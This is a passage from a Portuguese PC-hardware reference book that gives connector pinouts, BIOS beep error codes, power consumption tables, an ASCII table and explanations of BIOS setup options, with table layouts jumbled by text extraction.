KEYBOARD E MOUSE CONECTOR ( MINI-DIN - PS2 )

PINO SINAL 1 KEYBOARD

DATA 2 MOUSE

DATA 3 GND 4 +5 VCC 5 KEYBOARD

CLOCK 6 MOUSE

CLOCK

PS2 Fêmea

Terrorismo Tecnológico Aprenda Para Sobreviver

422

KEYBOARD CONECTOR

PINO SINAL1 CLK 2 DATA 3 RESET4 GND 5 +5

VCC

Keyboard Fêmea

GAME CONECTOR

PINO SINAL 1 + 5 VDC 2 BOTÃO 4

(A_PB1) 3 POSIÇÃO

0 (A_X) 4 GND 5 GND 6 POSIÇÃO

1 (A_Y) 7 BOTÃO 5

(A_PB2) 8 + 5 VDC 9 + 5 VDC 10 BOTÃO 6

(B_PB1) 11 POSIÇÃO

2 (B_X) 12 GND 13 POSIÇÃO

DB15 FÊMEA

Terrorismo Tecnológico Aprenda Para Sobreviver

423

3 (B_Y) 14 BOTÃO 7

(B_PB2) 15 +5 VDC

CONECTOR DO BARRAMENTO ISA

sinal pinos sinal GND B1 A1 IOCHCk RESET B2 A2 D7 +5v B3 A3 D6 IRQ9 B4 A4 D5 -5v B5 A5 D4 DRQ2 B6 A6 D3 -12v B7 A7 D2 WS B8 A8 D1 +12v B9 A9 D0 GND B10 A10 IOCHRDY Mem W B11 A11 AEN Mem R B12 A12 A19 IO W B13 A13 A18 IO R B14 A14 A17 DACK3 B15 A15 A16 DRQ3 B16 A16 A15 DACK1 B17 A17 A14 DRQ1 B18 A18 A13 Ref B19 A19 A12 CLK B20 A20 A11

Terrorismo Tecnológico Aprenda Para Sobreviver

424

IRQ7 B21 A21 A10 IRQ6 B22 A22 A9 IRQ5 B23 A23 A8 IRQ4 B24 A24 A7 IRQ3 B25 A25 A6 DRQ2 B26 A26 A5 TC B27 A27 A4 ALE B28 A28 A3 +5v B29 A29 A2 OSC B30 A30 A1 GND B31 A31 A0

M16CS D1 C1 SBHE

IO16CS D2 C2 A23

IRQ10 D3 C3 A22

IRQ11 D4 C4 A21

IRQ12 D5 C5 A20

IRQ15 D6 C6 A19

IRQ14 D7 C7 A18

DACK0 D8 C8 A17

DRQ0 D9 C9 MR

DACK5 D10 C10 MW

DRQ5 D11 C11 D8

DACK6 D12 C12 D9

DRQ6 D13 C13 D10

DACK7 D14 C14 D11

Terrorismo Tecnológico Aprenda Para Sobreviver

425

DRQ7 D15 C15 D12

+5v D16 C16 D13

Master D17 C17 D14

GND D18 C18 D15

CONECTOR DO BARRAMENTO PCI

SINAL PINO SINAL -12v A1 B1 TRS# Test Reset

TCK Test clok A2 B2 +12 v GND A3 B3 TMS (Test Mode Select) TDO Test data output

A4 B4 TDI (Test Data Imput)

+5v A5 B5 +5v +5v A6 B6 INTA (interrupt A) INTB (interrupt B) A7 B7 INTC (interrupt C) INTD (interrupt D) A8 B8 Reserved PRSNT 1 Exp.Card Present 1

A9 B9 +5v

Reserved A10 B10 Reserved PRSNT 2 Exp.Card Present 2

A11 B11 GND

GND A12 B12 GND GND A13 B13 Reserved Reserved A14 B14 RST (Reset) GND A15 B15 +5v

Terrorismo Tecnológico Aprenda Para Sobreviver

426

CLK Clock A16 B16 GNT (Grant (Bus Memory Only)

GND A17 B17 GND REQ (Bus Master Only)

A18 B18 AD30(Address-Data 30)

+5v A19 B19 +3.3v AD31(Address-Data 31)

A20 B20 AD28(Address-Data 28)

AD29(Address-Data 29)

A21 B21 AD26(Address-Data 26)

GND A22 B22 GND AD27(Address-Data 27)

A23 B23 AD24(Address-Data 24)

AD25(Address-Data 25)

A24 B24 IDSEL Iniciliazation;Device Select

+3.3v A25 B25 +3.3v CBE3 Bus Command Byte EN 3

A26 B26 AD22(Address-Data 22)

AD23(Address-Data 23)

A27 B27 AD20(Address-Data 20)

GND A28 B28 GND AD21(Address-Data 21)

A29 B29 AD18(Address-Data 18)

AD19(Address-Data 19)

A30 B30 AD16(Address-Data 16)

+3.3v A31 B31 +3.3v AD17(Address-Data 17)

A32 B32 FRME# Cycle Flame

CBE2 Bus Command Byte EN 2

A33 B33 GND

GND A34 B34 TRDY (Target Ready)

Terrorismo Tecnológico Aprenda Para Sobreviver

427

IRDY Initiador Ready

A35 B35 GND

+3.3v A36 B36 Stop DEVSEL Device Select

A37 B37 +3.3v

GND A38 B38 SDONE Snoop Done Lock A39 B39 SBO Snoop Backoff PERR Parity Error A40 B40 GND +3.3v A41 B41 PAR Parity SERR System Error

A42 B42 AD15(Address-Data 15)

+3.3v A43 B43 +3.3v CBE1 Bus Command Byte EN 1

A44 B44 AD13(Address-Data 13)

AD14(Address-Data 14)

A45 B45 AD11(Address-Data 11)

GND A46 B46 GND AD12(Address-Data 12)

A47 B47 AD9(Address-Data 9)

AD10(Address-Data 10)

A48 B48 Key

GND A49 B49 Key Key A52 B52 CBE0# Bus Command

Byte EN 0 Key A53 B53 +3.3v AD8(Address-Data 8)

A54 B54 AD6(Address-Data 6)

AD7(Address-Data 7)

A55 B55 AD4(Address-Data 4)

+3.3v A56 B56 GND

Terrorismo Tecnológico Aprenda Para Sobreviver

428

AD5(Address-Data 5)

A57 B57 AD2(Address-Data 2)

AD3(Address-Data 3)

A58 B58 AD0(Address-Data 0)

GND A59 B59 +5v AD1(Address-Data 1)

A60 B60 REQ64 Request 64 bit Transfer

+5v A61 B61 +5v ACK 64 bit Transfer

A62 B62 +5v

Terrorismo Tecnológico Aprenda Para Sobreviver

429

Beeps

Terrorismo Tecnológico Aprenda Para Sobreviver

430

CÓDIGOS DE ERRO GERADOS POR BEEPS DE BIOS

BIOS AMI

FHOENIX 4.0

1 Refresh dos módulos de memória com defeito ( pode ser causado pela placa mãe )

1 1 1 31 1 1 4

Processador ou placa mãe

2 Paridade de memória ( sistema que checa paridade ou pente de memória com defeito)

1 1 2 31 1 1 4

Placa mãe

3 Primeiros 64 Kb de memória com problema

1 1 3 4 Cachê do processador

4 Clock com defeito ( placa mãe )

1 1 4 4 Inicialização da controladora IDE

5 Placa mãe ou processador com defeito ( geralmente o defeito é na placa pois o processador achou o problema )

1 2 1 4 Bus Mastering

1 2 2 1 3 1 3 1

controladora do teclado com problema ( pode ser placa mãe )

6 Teclado ou acesso a memória alta com defeito

1 2 2 3 Bios ou placa mãe com defeito

7 Novamente placa mãe ou processador com defeito ( geralmente o defeito é na placa pois o

1 3 1 1 Memória ou placa mãe

Terrorismo Tecnológico Aprenda Para Sobreviver

431

processador achou o problema )

8 Falha no teste da memória de vídeo ( placa de vídeo ou placa mãe )

1 3 4 11 3 4 31 4 1 1

Memória ou placa mãe ( verifique a memória primeiro )

9 Programa da bios com problema ( pode ser causado também pela placa mãe )

2 1 3 2 Alguma placa PCI com problema

10 Problema com leitura de dados CMOS da Bios deve-se resetar a CMOS se persiste o erro deve-se substituir a placa mãe.

2 1 3 3 Placa de vídeo ( ou placa mãe )

11 Memória cachê da placa mãe ( se houver ) esta com defeito

2 2 4 1 Memória da placa mãe ( cachê )

BIOS AWARD

1 longo1 curto

Bios de terceiros ( placas extras como controladoras SCSI por exemplo )

1 longo Um dos primeiros módulos de memória com defeito

1 longo2 curtos

Controladora de vídeo com defeito ( pode ser causado pela placa mãe )

os demais Memória RAM

Observação: Quando não houver som deve-se verificar primeiramente os pentes de memória se estão bem encaixados, se não resolver reset a CMOS, verifique o encaixe do processador ( se a bateria que alimenta a CMOS estiver com carga muito baixa também pode impedir a inicialização do sistema. Se após tudo isto continuar sem

Terrorismo Tecnológico Aprenda Para Sobreviver

432

ou placa mãe sinal, há maior chance de haver um problema grave com a placa mãe e em segundo caso o processador

mais...beeps

AMI BIOS Tone POST Codes -

AMI BIOS Tone POST Codes - Fatal Errors

TONE CONDITION 1 short DRAM refresh 2 short Parity circuit 3 short Base 64K RAM 4 short System timer 5 short Processor 6 short Keyboard

controller gate A20

7 short Virtual mode exception

8 short Display memory read/write test

9 short ROM BIOS checksum

10 short CMOS shutdown read/write

11 short Cache memory

Terrorismo Tecnológico Aprenda Para Sobreviver

433

Non-Fatal Errors TONE CONDITION 1 long, 3 short

Conventional/extended memory

1 long, 8 short

Display/retrace test

Phoenix BIOS Tone POST Codes - Fatal Errors

TONE CONDITION None CPU register test None First 64K RAM test None Interrupt vector

loading proceeding None CMOS power

failure/checksum calculation

None Display configuration validation proceeding

None Display running with video ROM

None Display functional None Mononchrome

display functional None CGA display

functional 1-1-3 CMOS write/read 1-1-4 ROM BIOS

checksum

Terrorismo Tecnológico Aprenda Para Sobreviver

434

1-2-1 Programmable interval timer

1-2-2 DMA Initialization 1-2-3 DMA page register

write/read 1-3-1 RAM refresh

verification 1-3-3 First 64K RAM chip

or data line 1-3-4 First 64K RAM

odd/even logic 1-4-1 Address line first

64K RAM 1-4-2 Parity failure first

64K RAM 2-1-1 Bit 0, first 64K RAM 2-1-2 Bit 1, first 64K RAM 2-1-3 Bit 2, first 64K RAM 2-1-4 Bit 3, first 64K RAM 2-2-1 Bit 4, first 64K RAM 2-2-2 Bit 5, first 64K RAM 2-2-3 Bit 6, first 64K RAM 2-2-4 Bit 7, first 64K RAM 2-3-1 Bit 8, first 64K RAM 2-3-2 Bit 9, first 64K RAM 2-3-3 Bit 10, first 64K RAM 2-3-4 Bit 11, first 64K RAM 2-4-1 Bit 12, first 64K RAM 2-4-2 Bit 13, first 64K RAM 2-4-3 Bit 14, first 64K RAM 2-4-4 Bit 15, first 64K RAM 3-1-1 Slave DMA register 3-1-2 Master DMA register 3-1-3 Master interrupt

mask register

Terrorismo Tecnológico Aprenda Para Sobreviver

435

3-1-4 Slave interrupt mask register

3-2-4 Keyboard controller 3-3-4 Display initialization 3-4-1 Display retrace 3-4-2 Search for video

ROM proceeding

Phoenix BIOS POST Tone Codes - Non-Fatal Errors

TONE CONDITION 4-2-1 Timer tick

interrupt test 4-2-2 Shutdown test 4-2-3 Gate A20 Failure 4-2-4 Unexpected

interrupt in protected moe

4-3-1 RAM test (address failure >FFFFh)

4-3-3 Interval timer channel 2

4-3-4 Real time clock 4-4-1 Serial Port 4-4-2 Parallel Port 4-4-3 Math Co-

processor test 1-1-2* System board

select 1-1-3* Extender CMOS

RAM

IBM POST Tone Codes

TONE CONDITION

Terrorismo Tecnológico Aprenda Para Sobreviver

436

NONE System board, power supply

1 short System passed all tests

2 short Display error continuous System board,

power supply 1 long,1short

System board

1 long, 2 short

Video adapter

1 long, 3 short

EGA

3 long 3270 keyboard card

Terrorismo Tecnológico Aprenda Para Sobreviver

437

Energia

Terrorismo Tecnológico Aprenda Para Sobreviver

438

GERENCIAMENTO DE CONSUMO DE ENERGIA NOS PCs O consumo de energia de um PC depende de vários fatores como tipo de processador, quantidades de componentes instalados, monitor, periféricos ...etc..., e depende também do gerenciamento de energia do sistema. Temos abaixo algumas tabelas que pode ajudar a configuração do gerenciamento de energia nos PCs.

CONSUMO DE ALGUNS TIPOS DE PCs

Computador ou monitor (com

recursos médios)

Potência sem gerenciamento de

consumo

Potência com gerenciamento de

consumo 386 65 Watts 25 Watts 486 55 Watts 25 Watts Pentium 45 Watts 15 Watts Monitor de 14" 45 Watts 5 Watts Monitor de 15" 70 Watts 5 Watts Monitor de 20" 120 Watts 5 Watts

CONSUMO DE ALGUNS PERIFÉRICOS E DISPOSITIVOS

Cooler 1,44 Watts Drive de Disquetes 5 Watts Drive de CD ou DVD 20 Watts Gravador de CD 25 Watts HD 10 Watts Impressora matricial 30 a 50 Watts Impressora Jato de Tinta 30 a 50 Watts Impressora a Laser 500 a 800 Watts Mouse PS2 0,44 Watts Mouse serial 0,12 Watts Scanner de mesa 40 a 50 Watts Scanner manual 4 a 8 Watts Som 4 a 5 Watts ( depende da

potência de áudio e volume

Terrorismo Tecnológico Aprenda Para Sobreviver

439

usado) Teclado 1,25 Watts Zip IDE interno Maximo 8,5 Watts

HABILITANDO O GERENCIAMENTO DE CONSUMO

O gerenciamento de consumo está disponível em todos os computadores e podem ser habilitados, nos mais antigos pode-se apenas reduzir o consumo do monitor, mas nos mais modernos pode-se gerenciar o consumo de quase todos os dispositivos.

SISTEMA OPERACIONAL

No sistema operacional Windows pode-se reduzir o consumo

ativando-se o protetor de tela ( screensaver ) do monitor e ajustando as opções para outros dispositivos ( HD ) através do programa de

Gerenciamento de energia ( Painel de controle ).

BIOS:

Também se pode usar para a finalidade de economia de energia através das opções Standby ( sleep ), doze e suspend.

Doze - Reduz o consumo durante a inatividade do sistema, com a redução da velocidade do processador.

Standby - Envia o sinal de Power down para o monitor. Suspend - Envia um comando para a CPU e para o monitor para

entrar em estado de baixo consumo.

Exemplo de configuração de consumo pela BIOS. Power management User Define IRQ1- Keyboard On PM Control by APM Yes

Terrorismo Tecnológico Aprenda Para Sobreviver

440

IRQ3-COM2 ( Com PORT ) Off VGA Adapter Type Green IRQ4-COM1 ON Doze Mode 20 Sec IRQ5-LPT2 Off Standby Mode 5 Min IRQ6-FDD Controller On Suspend Mode 10 Min IRQ7-LPT1 Off HDD Power Down 15 Min IRQ8-RTC Real time Clock Alarm

Off

IRQ3 ( wake up event ) Off IRQ9-IRQ2 Redir Off IRQ4 ( wake up event ) On IRQ10-( Reserved ) Off IRQ8 ( wake up event ) Off IRQ11-( Reserved ) On IRQ12 ( wake up event ) Off IRQ12-ps 2 Mouse On

POWER DOWN ACTIVITIES

IRQ13-Numeric Data Processor

Off

COM Ports Accessed Off IRQ14-HDD, IDE / ESDI Controller

On

LPT Ports Accessed Off IRQ15-Reserved Off DMA Active ( DMA ) Off

Terrorismo Tecnológico Aprenda Para Sobreviver

441

Tabela ASCII

Terrorismo Tecnológico Aprenda Para Sobreviver

442

TABELA ASCII

Tabela ASCII gerada em PC teclado ABNT2

DEC HEX ASC DEC HEX ASC DEC HEX ASC DEC HEX ASC 0 0 NUL 64 40 @ 128 80 Ç 192 C0 + 1 1 SOH 65 41 A 129 81 ü 193 C1 - 2 2 STX 66 42 B 130 82 é 194 C2 - 3 3 ETX 67 43 C 131 83 â 195 C3 + 4 4 EOT 68 44 D 132 84 ä 196 C4 - 5 5 ENQ 69 45 E 133 85 à 197 C5 + 6 6 ACK 70 46 F 134 86 å 198 C6 ã 7 7 BEL 71 47 G 135 87 ç 199 C7 Ã 8 8 BS 72 48 H 136 88 ê 200 C8 + 9 9 HT 73 49 I 137 89 ë 201 C9 + 10 A LF 74 4A J 138 8A è 202 CA - 11 B VT 75 4B K 139 8B ï 203 CB - 12 C FF 76 4C L 140 8C î 204 CC ¦ 13 D CR 77 4D M 141 8D ì 205 CD - 14 E SO 78 4E N 142 8E Ä 206 CE + 15 F SI 79 4F O 143 8F Å 207 CF ¤ 16 10 DLE 80 50 P 144 90 É 208 D0 ð 17 11 DC1 81 51 Q 145 91 æ 209 D1 Ð 18 12 DC2 82 52 R 146 92 Æ 210 D2 Ê 19 13 DC3 83 53 S 147 93 ô 211 D3 Ë 20 14 DC4 84 54 T 148 94 ö 212 D4 È 21 15 NAK 85 65 U 149 95 ò 213 D5 i 22 16 SYN 86 56 V 150 96 û 214 D6 Í 23 17 ETB 87 57 W 151 97 ù 215 D7 Î

Terrorismo Tecnológico Aprenda Para Sobreviver

443

24 18 CAN 88 58 X 152 98 ÿ 216 D8 Ï 25 19 EM 89 59 Y 153 99 Ö 217 D9 + 26 1A SUB 90 5A Z 154 9A Ü 218 DA + 27 1B ESC 91 5B [ 155 9B ø 219 DB _ 28 1C FS 92 5C \ 156 9C £ 220 DC _ 29 1D GS 93 5D ] 157 9D Ø 221 DD ¦ 30 1E RS 94 5E ^ 158 9E × 222 DE Ì 31 1F US 95 5F _ 159 9F ƒ 223 DF _ 32 20 SP 96 60 ` 160 A0 á 224 E0 Ó 33 21 ! 97 61 a 161 A1 í 225 E1 ß 34 22 " 98 62 b 162 A2 ó 226 E2 Ô 35 23 # 99 63 c 163 A3 ú 227 E3 Ò 36 24 $ 100 64 d 164 A4 ñ 228 E4 õ 37 25 % 101 65 e 165 A5 Ñ 229 E5 Õ 38 26 & 102 66 f 166 A6 ª 230 E6 µ 39 27 ' 103 67 g 167 A7 º 231 E7 þ 40 28 ( 104 68 h 168 A8 ¿ 232 E8 Þ 41 28 ) 105 69 i 169 A9 ® 233 E9 Ú 42 2A * 106 6A j 170 AA ¬ 234 EA Û 43 2B + 107 6B k 171 AB ½ 235 EB Ù 44 2C , 108 6C l 172 AC ¼ 236 EC ý 45 2D - 109 6D m 173 AD ¡ 237 ED Ý 46 2E . 110 6E n 174 AE « 238 EE ¯ 47 2F / 111 6F o 175 AF » 239 EF ´ 48 30 0 112 70 p 176 B0 _ 240 F0 48 31 1 113 71 q 177 B1 _ 241 F1 ± 50 32 2 114 72 r 178 B2 _ 242 F2 _ 51 33 3 115 73 s 179 B3 ¦ 243 F3 ¾

Terrorismo Tecnológico Aprenda Para Sobreviver

444

52 34 4 116 74 t 180 B4 ¦ 244 F4 ¶ 53 35 5 117 75 u 181 B5 Á 245 F5 § 54 36 6 118 76 v 182 B6 Â 246 F6 ÷ 55 37 7 119 77 w 183 B7 À 247 F7 ¸ 56 38 8 120 78 x 184 B8 © 248 F8 ° 57 39 9 121 79 y 185 B9 ¦ 249 F9 ¨ 58 3A : 122 7A z 186 BA ¦ 250 FA · 59 3B ; 123 7B { 187 BB + 251 FB ¹ 60 3C < 124 7C | 188 BC + 252 FC ³ 61 3D = 125 7D } 189 BD ¢ 253 FD ² 62 3E > 126 7E ~ 190 BE ¥ 254 FE _ 63 3F ? 127 7F DEL 191 BF + 255 FF DEL

Terrorismo Tecnológico Aprenda Para Sobreviver

445

Setup

Terrorismo Tecnológico Aprenda Para Sobreviver

446

Setup

Para entrar no setup você deve pressionar a tecla Del durante a contagem de memória. Em alguns micros "de marca" (como os da IBM), a tecla é outra e você deve prestar atenção às instruções que aparecem na tela do micro durante a contagem de memória para poder ter acesso ao setup.

Dentro do setup, a navegação é normalmente feita utilizando-se as setas de movimentação do teclado, a tecla Enter para selecionar um menu, Esc para retornar ao menu anterior e as teclas Page Up e Page Down para modificar uma opção existente.

É muito importante notar que as alterações feitas enquanto você está dentro do setup não são gravadas automaticamente dentro da memória de configuração (CMOS). Por isso há a necessidade de se gravar as alterações antes de sair do setup, através da opção Save and Exit.

Ao entrar no setup você verá um menu principal com opções para a entrada em outros menus de configuração. Essas opções são basicamente as seguintes:

• CPU Setup: Em micros onde a placa-mãe não tem jumpers de configuração você encontrará esse menu, que serve para você configurar o processador: multiplicação de clock, clock externo, etc

• Standard CMOS Setup: Setup básico. Nesse menu configuramos opções básicas do micro, como o tipo de unidade de disquete, a data e hora e os parâmetros do disco rígido (os parâmetros do disco rígido podem ser configurados automaticamente através de uma opção chamada Hdd Auto Detection).

Terrorismo Tecnológico Aprenda Para Sobreviver

447

• Advanced CMOS Setup (ou BIOS Features Setup): Setup avançado. Aqui você encontrará algumas opções de configuração avançada, que em sua maioria inclui opções de customização do seu micro e que podem ser alteradas de acordo com o seu gosto pessoal. Também há aqui algumas opções que podem aumentar o desempenho do micro.

• Advanced Chipset Setup: Setup avançado do chipset. São opções para a configuração do chipset da placa-mãe. Essas opções incluem configurações que normalmente envolvem o acesso à memória RAM do micro, como wait states. Se você fizer alguma configuração errada nesse menu o micro pode travar. Por isso, não mexa nas opções desse menu a não ser que você tenha certeza do que está fazendo.

• PCI/Plug and Play Setup: Configura os recursos alocados por dispositivos instalados no micro, tais como placas de som e fax/modems.

• Power Management Setup: Neste menu você faz toda a configuração do gerenciamento de consumo elétrico, a fim de que o micro economize energia.

• Peripheral Setup (ou Integrated Peripherals): Configura os dispositivos integrados à placa-mãe (on-board).

• Auto Configuration With BIOS Defaults: Coloca os valores de fábrica em todas as opções do setup.

Terrorismo Tecnológico Aprenda Para Sobreviver

448

• Auto Configuration With Power-on Defaults: Coloca os valores contidos na memória CMOS nas opções do setup. Em outras palavras, configura o setup da mesma maneira que estava antes de você entrar nele.

• Change Password: Configura uma senha que será pedida quando você ligar o micro (ou tentar entrar no setup, dependendo da configuração efetuada no setup avançado).

• Auto Detect Hard Disk (ou HDD Auto Detect ou IDE Setup): Lê os parâmetros dos discos rígidos IDE do micro e configura automaticamente o setup avançado com os valores lidos.

• Hard Disk Utility (ou HDD Low Level Format): Formata o disco rígido em baixo nível (formatação física). Essa opção não deve nunca ser usada, sob a pena de você danificar permanentemente o seu disco rígido.

• Write to CMOS and Exit: Salva as alterações efetuadas na memória de configuração (CMOS) e sai do setup.

• Do Not Write to CMOS and Exit: Sai do setup sem gravar as alterações.

Terrorismo Tecnológico Aprenda Para Sobreviver

449

O setup básico não apresenta dificuldades em sua configuração. Nele você deve configurar:

Data e hora do sistema, através das opções date e time, respectivamente. Tipos de unidades de disquete instaladas no micro. Você deve configurar que tipo (2.88 MB, 1.44 MB, 1.2 MB, 720 KB ou 360 KB) são as unidades de disquete A e B de seu micro. Um erro muito comum cometido por iniciantes é achar que para trocar a unidade A com a B (isto é, a atual unidade A passar a se chamar B e vice-versa) basta mudar aqui a configuração. Isso não é verdade. Para trocar a unidade A com a B é necessário abrir o micro e trocar a posição das unidades no flat-cable que liga as unidades à controladora (normalmente na placa-mãe). A unidade instalada na ponta do cabo sempre será a A e a unidade instalada no meio, sempre será a unidade B. Como atualmente a maioria dos micros só tem uma unidade (A, de 1.44 MB), na maioria das vezes você deve configurar a unidade A como sendo de 1.44 MB e a unidade B como "não instalada" (Not Installed). Geometria do disco rígido. Essa é a configuração mais difícil do setup básico mas, para a nossa sorte, há uma opção no menu principal do setup – chamada Hdd Auto Detection, IDE Setup ou similar, como vimos na semana passada – que lê os dados do disco rígido e configura automaticamente a geometria do disco rígido. Portanto, não há com o que se preocupar. Tipo de placa de vídeo. Configure como EGA/VGA. Algumas pessoas se confundem aqui. Essa opção configura o tipo de placa de vídeo instalada dentro do micro e não o tipo de monitor de vídeo. Existe uma opção chamada "Monochrome", que é para micros que tenham uma placa de vídeo MDA instalada. Se você tem um micro com placa de vídeo VGA ou Super VGA com um monitor monocromático instalado, a opção correta é EGA/VGA (que configura a placa de vídeo que está instalada no micro) e não Monochrome (já que a sua placa de vídeo não é MDA).

Terrorismo Tecnológico Aprenda Para Sobreviver

450

E só. Em alguns setups podem aparecer algumas opções a mais:

• Floppy Mode 3 Support: Existe uma unidade de disquete japonesa que é de 3 1/2" e 1.2 MB (em vez de 1.44 MB) e, para que o micro a reconheça, é necessário habilitar esta opção. Como você provavelmente não tem esse tipo de unidade em seu micro, deixe essa opção desabilitada (Disabled).

• Halt On: Essa opção informa ao micro em que situação de erro ele deverá parar durante o auto teste inicial da máquina (POST). A opção default é "All Errors", ou seja, em qualquer situação de erro detectada durante o autoteste o micro irá parar e uma mensagem de erro será apresentada. Já a opção "All but keyboard" fará o micro parar em todos os tipos de erro, menos em erros de teclado. E assim por diante de acordo com as demais opções disponíveis. Nossa recomendação é que você configure essa opção em "All Errors".

• Daylight Saving: Essa opção não é muito comum e provavelmente você só encontrará em micros muito antigos. Essa opção habilita o ajuste automático do horário de verão (que em inglês chama-se daylight saving). Acontece que esse ajuste baseia-se nos EUA, onde o verão ocorre durante o nosso inverno e, portanto, essa opção deve permanecer desabilitada (Disabled).

É claro que em alguns micros você poderá encontrar outras informações no setup básico, como a quantidade de memória RAM instalada no micro. Mas as opções que você encontrará em todos os setups são essas que apresentamos.

Terrorismo Tecnológico Aprenda Para Sobreviver

451

Como o próprio nome indica, no setup avançado (Advanced CMOS Setup) existem opções avançadas de configuração do micro. Entretanto, a maioria das opções do setup avançado são ajustadas de acordo com o gosto do usuário, como você perceberá. A seguir iremos apresentar as opções mais comuns do setup avançado, indicando a nossa recomendação de configuração, muito embora você não precise seguir à risca nossas recomendações já que, como dissemos, diversas opções são configuradas de acordo com o gosto do usuário.

É importante notar que o setup do seu micro pode não ter todas as opções aqui descritas, da mesma forma que podem existir opções que não apresentamos aqui. Lembre-se que para habilitar uma opção, você deverá configurá-la como "enabled" e, para desabilitar, como "disabled".

• Typematic Rate Programming: Você pode configurar a taxa de repetição de teclas do teclado habilitando essa opção, isto é, ao manter uma tecla pressionada, ela começará a ser repetida automaticamente. A configuração dessa taxa é feita através das duas opções a seguir.

• Typematic Rate Delay: Configura o tempo que o micro demorará para começar a repetir uma tecla caso você mantenha ela pressionada. O valor configurado nessa opção é dado em milissegundos.

• Typematic Rate: Configura a quantidade de caracteres por segundo que a repetição automática irá gerar.

Terrorismo Tecnológico Aprenda Para Sobreviver

452

• Quick Power On Self Test: Em BIOS Award, o teste de memória é executado três vezes. Com essa opção habilitada, o teste é feito somente uma vez, tornando o processo de boot mais rápido.

• Above 1 MB Memory Test: Habilite essa opção para que o micro teste toda a memória RAM durante a contagem de memória. Caso essa opção não seja habilitada, o micro só irá testar o primeiro 1 MB de memória, o que não é bom.

• Memory Test Tick Sound: Habilita o barulho ("tick") feito durante a contagem de memória. O ajuste fica a gosto pessoal.

• Hit <del> Message Display: Com essa opção habilitada, a mensagem "Hit <del> To Run Setup" é mostrada durante a contagem de memória. Nossa recomendação é que essa opção permaneça habilitada, muito embora você continue podendo entrar no setup normalmente mesmo que essa mensagem não seja apresentada durante a contagem de memória.

• Wait For <F1> If Any Error: Similarmente à opção anterior, habilita a mensagem "Press <F1> To Resume" caso ocorra algum erro durante o autoteste (POST). Recomendamos habilitar essa opção.

Terrorismo Tecnológico Aprenda Para Sobreviver

453

• System Boot Up Num Lock: Configura o estado da tecla Num Lock ao ligar o micro. Nossa sugestão é habilitar essa opção.

• Floppy Drive Seek at Boot: Faz um teste, após a contagem de memória, para ver se as unidades de disquete configuradas no setup básico realmente estão instaladas. Nossa recomendação é que você desabilite essa opção para que o processo de boot torne-se mais rápido.

• System Boot Up Sequence: Configura a seqüência de boot, isto é, de qual unidade o boot será dado. Nossa recomendação é que você configure essa opção como "C Only" (ou "C, A" caso essa opção não exista). Isso fará com que o boot seja mais rápido (já que o micro irá ler diretamente o sistema operacional do disco rígido) e evitará que o seu micro seja contaminado por vírus de boot (já que o boot através de disquete ficará desabilitado).

• Bootsector Virus Protection (ou Anti-virus ou Virus Warning): Tome cuidado, pois o nome dessa opção induz a um erro. Com essa opção habilitada, o micro não irá permitir que nenhum programa atualize o setor de boot do disco rígido, tarefa que algum vírus pode tentar efetuar. O grande problema é que alguns utilitários de disco (como o Norton Utilities) e o próprio programa de instalação do sistema operacional alteram dados do setor de boot, fazendo com que o micro acuse falsamente um erro quando essa opção está habilitada. Aliás, é por isso que muitos técnicos não conseguem instalar o sistema operacional quando essa opção está habilitada. Por isso, nossa recomendação é que você mantenha essa opção desabilitada. Se você quer se proteger contra vírus, use um bom programa anti-vírus.

Terrorismo Tecnológico Aprenda Para Sobreviver

454

• Password Checking Option (ou Security Option): No menu principal do setup podemos definir, através da opção Change Password, uma senha que será pedida quando o micro é ligado. Através dessa opção configuramos quando essa senha será solicitada: sempre em que ligamos o micro (opção Always ou System) ou então só quando tentamos entrar no setup (opção Setup). A configuração fica a seu critério, de acordo com a sua política de segurança.

• Swap Floppy Drive ou Floppy Drive Swapping: Essa opção troca a unidade A com a B. Isto é, se a sua unidade A for de 5 1/4" e a B, de 3 1/2", habilitando essa opção a unidade A passará a ser a de 3 1/2" e a B, a de 5 1/4". Como hoje em dia a maioria dos micros só possui uma única unidade de disquetes (de 3 1/2"), essa opção deve permanecer desabilitada.

• PCI VGA Palette Snooping ou VGA Palette Snoop: Essa opção compatibiliza algumas placas de vídeo antigas de alta resolução com o padrão VGA. Como atualmente todas as placas de vídeo são compatíveis com esse padrão, essa opção deve ficar desabilitada.

• Hard Disk Type 47 RAM Area ou Extended ROM RAM Area ou Extended BIOS RAM Area ou Scratch RAM Option: Essa opção configura como será acessada a área de memória RAM que o BIOS usa como rascunho. Existem duas opções: "DOS 1KB", que diminui a memória convencional de 640 KB para 639 KB e usa essa área de 1 KB para acessar a área de rascunho; ou "0:300", que usa o endereço 300h para acessar

Terrorismo Tecnológico Aprenda Para Sobreviver

455

essa área de rascunho. A primeira opção é melhor, já que a segunda opção normalmente fará com que o seu micro apresente conflito com uma placa de rede, que placas de rede normalmente utilizam o endereço 300h para se comunicarem com o micro. Essa perda de 1 KB de memória atualmente é desprezível.

• External Cache Memory ou L2 Cache Memory: Habilita o cache de memória L2. Habilite, ou o seu micro ficará muito lento.

• Internal Cache Memory ou L1 Cache Memory: Habilita o cache de memória L1. Habilite, ou o seu micro ficará muito lento.

• System BIOS Cacheable ou System ROM Cacheable ou System BIOS Cacheable: Essa opção faz com que o BIOS do micro seja acessado usando o cache de memória, o que aumenta o desempenho do micro consideravelmente. Portanto, habilite essa opção.

• Video BIOS Cacheable ou Video Cacheable Option ou Video ROM Cache: Idem para a memória ROM da placa de vídeo. Habilite essa opção.

• System ROM Shadow ou Main BIOS Shadow ou Adaptor ROM Shadow F000, 64K ou F Segment Shadow: O shadow é uma técnica onde o conteúdo da memória ROM é copiado

Terrorismo Tecnológico Aprenda Para Sobreviver

456

para a memória RAM e a memória RAM passa a ser acessada em vez da ROM. Isso é feito de forma a aumentar o desempenho do micro, já que o tempo de acesso da memória ROM é maior do que o tempo de acesso da memória RAM (ou seja, a memória ROM é mais lenta do que a RAM). Essa opção habilita o shadow do BIOS do micro, fazendo com que o conteúdo do BIOS seja copiado para a RAM e, a partir de então, o processador passa a acessar a cópia do BIOS que está na memória RAM e não mais diretamente a memória ROM do micro. Obviamente recomendamos que essa opção seja habilitada.

• Video ROM Shadow ou Adaptor ROM Shadow C000, 32K ou Adaptor ROM Shadow C400, 16K: Idem para a ROM da placa de vídeo. Recomendamos que essa opção seja habilitada.

• Outras opções de Shadow: Outras opções de shadow deverão permanecer desabilitadas, já que normalmente não há outras memórias ROM no micro e, portanto, não há a necessidade de se habilitar shadow de outras áreas de memória.

